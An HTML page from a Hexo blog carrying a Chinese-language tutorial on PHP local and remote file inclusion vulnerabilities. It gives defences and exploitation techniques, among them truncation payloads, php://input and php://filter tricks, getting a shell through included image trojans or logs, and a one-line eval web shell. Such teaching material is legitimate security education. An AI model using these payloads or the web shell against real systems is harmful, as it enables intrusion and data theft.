<!DOCTYPE HTML>
<html>

<head>
	<link rel="bookmark"  type="image/x-icon"  href="/img/logo_miccall.png"/>
	<link rel="shortcut icon" href="/img/logo_miccall.png">
	
			    <title>
    Hexo
    </title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
    <link rel="stylesheet" href="/css/mic_main.css" />
    <link rel="stylesheet" href="/css/dropdownMenu.css" />
    <meta name="keywords" content="miccall" />
    
    	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	 
    <noscript>
        <link rel="stylesheet" href="/css/noscript.css" />
    </noscript>
    <style type="text/css">
        body:before {
          content: ' ';
          position: fixed;
          top: 0;
          background: url('/img/bg.jpg') center 0 no-repeat;
          right: 0;
          bottom: 0;
          left: 0;
          background-size: cover; 
        }
    </style>

			    
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script async type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


    <script src="/js/jquery.min.js"></script>
    <script src="/js/jquery.scrollex.min.js"></script>
    <script src="/js/jquery.scrolly.min.js"></script>
    <script src="/js/skel.min.js"></script>
    <script src="/js/util.js"></script>
    <script src="/js/main.js"></script>
	
<meta name="generator" content="Hexo 5.4.1"></head>
    
		
<!-- Layouts -->



<!--  代码渲染  -->
<link rel="stylesheet" href="/css/prism_coy.css" />
<link rel="stylesheet" href="/css/typo.css" />
<!-- 文章页 -->
<body class="is-loading">
    <!-- Wrapper 外包 s-->
    <div id="wrapper" class="fade-in">
        <!-- Intro 头部显示 s -->
        <!-- Intro 头部显示 e -->
        <!-- Header 头部logo start -->
        <header id="header">
    <a href="/" class="logo">MICCALL</a>
</header>
        <!-- Nav 导航条 start -->
        <nav id="nav" class="special" >
            <ul class="menu links" >
			<!-- Homepage  主页  --> 
			<li >
	            <a href="/" rel="nofollow">主页</a>
	        </li>
			<!-- categories_name  分类   --> 
	        
	        <li class="active">
	            <a href="#s1">分类</a>
	                    <ul class="submenu">
	                        <li>
	                        
	                    </ul>
	        </li>
	        
	        <!-- archives  归档   --> 
	        
	        
		        <!-- Pages 自定义   -->
		        
		        <li>
		            <a href="/about/" title="简历">
		                简历
		            </a>
		        </li>
		        
		        <li>
		            <a href="/group/" title="团队">
		                团队
		            </a>
		        </li>
		        
		        <li>
		            <a href="/gallery/" title="图库">
		                图库
		            </a>
		        </li>
		        
		        <li>
		            <a href="/tag/" title="标签">
		                标签
		            </a>
		        </li>
		        


            </ul>
            <!-- icons 图标   -->
			<ul class="icons">
                    
                    <li>
                        <a title="github" href="https://github.com/miccall" target="_blank" rel="noopener">
                            <i class="icon fa fa-github"></i>
                        </a>
                    </li>
                    
                    <li>
                        <a title="500px" href="http://500px.com" target="_blank" rel="noopener">
                            <i class="icon fa fa-500px"></i>
                        </a>
                    </li>
                    
			</ul>
</nav>

        <div id="main" >
            <div class ="post_page_title_img" style="height: 25rem;background-image: url();background-position: center; background-repeat:no-repeat; background-size:cover;-moz-background-size:cover;overflow:hidden;" >
                <a href="#" style="padding: 4rem 4rem 2rem 4rem ;"><h2 >文件包含</h2></a>
            </div>
            <!-- Post -->
            <div class="typo" style="padding: 3rem;">
                <h2 id="一、文件包含的原理"><a href="#一、文件包含的原理" class="headerlink" title="一、文件包含的原理"></a>一、文件包含的原理</h2><h3 id="1-什么是文件包含"><a href="#1-什么是文件包含" class="headerlink" title="1.什么是文件包含"></a>1.什么是文件包含</h3><p>(1)包含的意思</p>
<p>程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某个函数的时候，直接调用此文件，无需再次编写，这种调用文件的过程通常称为包含</p>
<p>(2)造成文件包含的原因</p>
<p>为了代码更灵活，通常会把被包含的文件设置为变量，进行动态调用，从而导致客户端可以调用任意文件，造成文件包含漏洞</p>
<p>动态包含的文件路径参数，客户端可控</p>
<p>(3)包含漏洞原理解析</p>
<p>大多数Web语言都可以使用文件包含操作，其中PHP语言所提供的文件包含功能太强大、太灵活。所以包含漏经常出现在PHP语言中，在JSP&#x2F;ASP&#x2F;ASP.net程序中比较少，甚至没有包含漏洞的存在，这与程序开发人员的水平无关，而问题在于语言设计的弊端</p>
<h3 id="2-漏洞的原理"><a href="#2-漏洞的原理" class="headerlink" title="2.漏洞的原理"></a>2.漏洞的原理</h3><p>PHP中提供了四个文件包含的函数，分别是include()、include_once()、require()和require_once（）</p>
<p>这四个函数都进行文件包含，但是作用不一样，区别如下:</p>
<table>
<thead>
<tr>
<th>函数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>include()</td>
<td>找不到被包含的文件时只产生警告，脚本将继续执行</td>
</tr>
<tr>
<td>include_once()</td>
<td>此语句和include()语句类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含</td>
</tr>
<tr>
<td>require()</td>
<td>找不到被包含的文件时会产生致命错误，并停止脚本</td>
</tr>
<tr>
<td>require_once（）</td>
<td>此语句和require()语句类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含</td>
</tr>
</tbody></table>
<p> require()和include()函数的区别∶</p>
<p> 使用require()函数包含文件时，只要程序执行，立即调用文件，而include()只有程序执行到该函数时才调用</p>
<p>其他用于包含的函数:highlight file()、show_sourc()、readfile()、file_get_contents()、fopen()、file()</p>
<h3 id="3-漏洞的原理"><a href="#3-漏洞的原理" class="headerlink" title="3.漏洞的原理"></a>3.漏洞的原理</h3><p>(1)文件包含经典代码：</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/2.png" alt="2"></p>
<p>以上代码，对$_GET[‘filename’]参数没有经过严格的过滤，直接带入了include()函数，攻击者可以修改$_GET[‘filename]的值，加载其他文件，执行非预期的操作，由此造成了文件包含漏洞</p>
<p>(2)文件包含漏洞防御</p>
<blockquote>
<p>严格判断包含中的参数是否外部可控</p>
</blockquote>
<blockquote>
<p>路径限制</p>
</blockquote>
<blockquote>
<p>包含文件验证</p>
</blockquote>
<blockquote>
<p>尽量不要使用动态包含，可以在需要包含的页面固定写好</p>
</blockquote>
<blockquote>
<p>php中可以使用open basedir配置限制访问</p>
</blockquote>
<blockquote>
<p>过滤 . 、\、&#x2F;等</p>
</blockquote>
<blockquote>
<p>禁止服务器远程文件包含</p>
</blockquote>
<h2 id="二、文件包含的利用"><a href="#二、文件包含的利用" class="headerlink" title="二、文件包含的利用"></a>二、文件包含的利用</h2><h3 id="1-文件包含漏洞的概述"><a href="#1-文件包含漏洞的概述" class="headerlink" title="1.文件包含漏洞的概述"></a>1.文件包含漏洞的概述</h3><p>(1)分类</p>
<p>主要包括本地文件包含(LFI)和远程文件包含(RFI)两种形式</p>
<p>简单来说，本地文件包含就是可以读取和打开本地文件，远程文件包含(HTTT,FTP,PHP伪协议）就是可以远程加载文件</p>
<p>(2)相关配置</p>
<p>allow_url_fopen&#x3D;On&#x2F;Off一是否允许打开URL文件，该选项为on便是允许包含URL对象文件等。默认开启</p>
<p>allow_url_include&#x3D;On&#x2F;Off一是否允许引用URL文件，激活URL形式的 fopen封装协议使得可以访问URL对象文件等。默认关闭</p>
<h3 id="2-本地文件包含（LFI）"><a href="#2-本地文件包含（LFI）" class="headerlink" title="2.本地文件包含（LFI）"></a>2.本地文件包含（LFI）</h3><p>(1)本地包含的意思</p>
<p>指的是通过相对路径的方式能打开并包含本地文件的漏洞，大部分情况下遇到的文件包含漏洞都是LFI</p>
<p>(2)包含条件</p>
<p>allow_url_fopen&#x3D;On (php.ini中进行配置，该选项默认为On )</p>
<p>用户可以动态控制变量</p>
<p>(3)无限制本地文件包含漏洞经典代码</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/3.png" alt="3"></p>
<p>(4)无限制本地文件包含漏洞利用</p>
<p>①获取到系统中的其他文件的内容</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/4.png" alt="4"></p>
<p>②包含图片木马</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/5.png" alt="5"></p>
<p>(5)无限制本地文件包含漏洞绕过</p>
<p>经典代码：</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/6.png" alt="6"></p>
<p>①%00截断</p>
<p>条件: Ⅰ.magic_quotes_gpc &#x3D; Off Ⅱ.php版本&lt;5.3.4</p>
<p>获取phpinfo.php文件，payload:?action&#x3D;phpinfo.php%00</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/7.png" alt="7"></p>
<p>②路径长度截断</p>
<p>条件:</p>
<p>Ⅰ.Windows下要长于256字节，超出的部分会被丢弃</p>
<p>Ⅱ.Linux下要长于4096字节，超出的部分会被丢弃</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/8.png" alt="8"></p>
<p>③点号截断</p>
<p>条件:windows系统，点号需要长于256</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/9.png" alt="9"></p>
<h3 id="3-远程文件包含（RFI）"><a href="#3-远程文件包含（RFI）" class="headerlink" title="3.远程文件包含（RFI）"></a>3.远程文件包含（RFI）</h3><p>(1)远程包含的意思</p>
<p>指的是能够包含远程服务器上的文件并执行，可以通过http(s)或者ftp等方式，远程加载文件</p>
<p>(2)危害</p>
<p>由于远程服务器的文件是我们可控的，因此漏洞一旦存在危害性会很大</p>
<p>(3)包含条件</p>
<p>allow_url_include&#x3D;On(默认为OFF，需要在php.ini中手动打开)</p>
<p>allow__url_fopen&#x3D;On（是否允许打开远程文件)</p>
<p>用户可以动态控制变量</p>
<p>(4)举例:</p>
<p>[URL]?path&#x3D;<a target="_blank" rel="noopener" href="http://ip/info.php">http://ip/info.php</a> &#x2F;&#x2F;通过http协议加载目标机中的info.php文件</p>
<p>[URL]?path&#x3D;ftp:&#x2F;&#x2F;用户名:密码@ip&#x2F;info.php &#x2F;&#x2F;通过ftp协议加载目标机中的info.php文件</p>
<p>(5)有限制远程文件包含漏洞绕过</p>
<p>①问号绕过</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/10.png" alt="10"></p>
<p>②#号绕过</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/11.png" alt="11"></p>
<p>③空格绕过</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/12.png" alt="12"></p>
<h3 id="4-漏洞的利用"><a href="#4-漏洞的利用" class="headerlink" title="4.漏洞的利用"></a>4.漏洞的利用</h3><p>(1)端口探测</p>
<p>url&#x3D;dict:&#x2F;&#x2F;ip:80</p>
<p>(2)包含上传的webshell达到getshell</p>
<p>上传图片马，利用文件包含我们的图片马，菜刀连接</p>
<p>(3)包含日志文件GetShell</p>
<p>为了避免在web中进行了url编码，进行报错，把报错信息写进日志</p>
<p>(4)远程文件包含写shell</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/13.png" alt="13"></p>
<p>在文件夹下会看到生成shell.php,内容为&lt;?php eval($_POST[‘1’]);?&gt;，当直接包含图片时，代码就会被执行</p>
<p>(5)使用PHP伪协议GetShell</p>
<h2 id="三、PHP伪协议"><a href="#三、PHP伪协议" class="headerlink" title="三、PHP伪协议"></a>三、PHP伪协议</h2><h3 id="1-PHP伪协议的介绍"><a href="#1-PHP伪协议的介绍" class="headerlink" title="1.PHP伪协议的介绍"></a>1.PHP伪协议的介绍</h3><p>(1)什么是伪协议</p>
<p>PHP伪协议事实上就是支持的协议与封装协议</p>
<p>(2)PHP伪协议的用途</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/14.png" alt="14"></p>
<h3 id="2-三种常用的PHP伪协议详解"><a href="#2-三种常用的PHP伪协议详解" class="headerlink" title="2.三种常用的PHP伪协议详解"></a>2.三种常用的PHP伪协议详解</h3><p>(1)file:&#x2F;&#x2F;协议</p>
<p>用途:访问本地系统文件</p>
<p>使用条件: </p>
<p>allow_url_fopen : off&#x2F;on</p>
<p>allow_url_include : off&#x2F;on </p>
<p>file:&#x2F;&#x2F;协议在两个配置都为off的情况下是可以正常使用的</p>
<p>使用方法: file:&#x2F;&#x2F;文件的绝对路径和文件名</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/20.png" alt="20"></p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/15.png" alt="15"></p>
<p>(2)php:&#x2F;&#x2F;filter</p>
<p>用途:常用于读取文件&#x2F;源码</p>
<p>·使用条件: allow..url..fopen : off&#x2F;on</p>
<p>allow..url..include : off&#x2F;on</p>
<p>两个配置都为off的情况下是可以正常使用的</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/19.png" alt="19"></p>
<p>注意∶通过指定末尾的文件，可以读取经base64加密后的文件源码，之后再base64解码。虽然不能直接获取到shell ,但能读取敏感文件</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/16.png" alt="16"></p>
<p>php:&#x2F;&#x2F;filter协议与file:&#x2F;&#x2F;协议的区别:file协议只能使用绝对路径，filter协议相对路径和绝对路径都可以使用</p>
<p>(3)php:&#x2F;&#x2F;input</p>
<p>用途:可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行</p>
<p>使用条件: </p>
<p>allow..url..fopen : off&#x2F;on</p>
<p>allow..url..include : on</p>
<p>使用方法:?file&#x3D;php:&#x2F;&#x2F;input</p>
<p>[POST] :&lt;?php phpinfo)?&gt;(执行POST DATA中的内容)</p>
<p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/17.png" alt="17"></p>
<h3 id="3-其他PHP伪协议的使用"><a href="#3-其他PHP伪协议的使用" class="headerlink" title="3.其他PHP伪协议的使用"></a>3.其他PHP伪协议的使用</h3><p><img src="https://raw.githubusercontent.com/Vinslwn/img/main/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/18.png" alt="18"></p>

            </div>

            <!-- Post Comments -->
            
    <!-- 使用 DISQUS_CLICK -->
<div id="disqus-comment">
    <div id="disqus_thread"></div>

<!-- add animation -->
<style>
	.disqus_click_btn {
            line-height: 30px;
            margin: 0;
            min-width: 50px;
            padding: 0 14px;
            display: inline-block;
            font-family: "Roboto", "Helvetica", "Arial", sans-serif;
            font-size: 14px;
            font-weight: 400;
            text-transform: uppercase;
            letter-spacing: 0;
            overflow: hidden;
            will-change: box-shadow;
            transition: box-shadow .2s cubic-bezier(.4, 0, 1, 1), background-color .2s cubic-bezier(.4, 0, .2, 1), color .2s cubic-bezier(.4, 0, .2, 1);
            outline: 0;
            cursor: pointer;
            text-decoration: none;
            text-align: center;
            vertical-align: middle;
            border: 0;
            background: rgba(158, 158, 158, .2);
            box-shadow: 0 2px 2px 0 rgba(0, 0, 0, .14), 0 3px 1px -2px rgba(0, 0, 0, .2), 0 1px 5px 0 rgba(0, 0, 0, .12);
            color: #fff;
            background-color: #7EC0EE;
            text-shadow: 0
        }
</style>
	
<div class="btn_click_load" id="disqus_bt"> 
    <button class="disqus_click_btn">点击查看评论</button>
</div>

<!--
<script type="text/javascript">
$('.btn_click_load').click(function() {
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'http-miccall-tech'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();

    document.getElementById('disqus_bt').style.display = "none";
});
</script>
-->
<script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'http://example.com/2022/04/21/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/';  // Replace PAGE_URL with your page's canonical URL variable
        this.page.identifier = 'http://example.com/2022/04/21/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/'; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
    };
</script>

<script type="text/javascript">
    $('.btn_click_load').click(function() {  //click to load comments
        (function() { // DON'T EDIT BELOW THIS LINE
            var d = document;
            var s = d.createElement('script');
            s.src = '//http-miccall-tech.disqus.com/embed.js';
            s.setAttribute('data-timestamp', + new Date());
            (d.head || d.body).appendChild(s);
        })();
        $('.btn_click_load').css('display','none');
    });
</script>
</div>
<style>
    #disqus-comment{
        background-color: #eee;
        padding: 2pc;
    }
</style>


        </div>
        <!-- Copyright 版权 start -->
                <div id="copyright">
            <ul>
                <li>&copy;Powered By <a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/" style="border-bottom: none;">hexo</a></li>
                <li>Design: <a target="_blank" rel="noopener" href="http://miccall.tech " style="border-bottom: none;">miccall</a></li>
            </ul>
            
                <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
			
        </div>
    </div>
</body>



 	
</html>
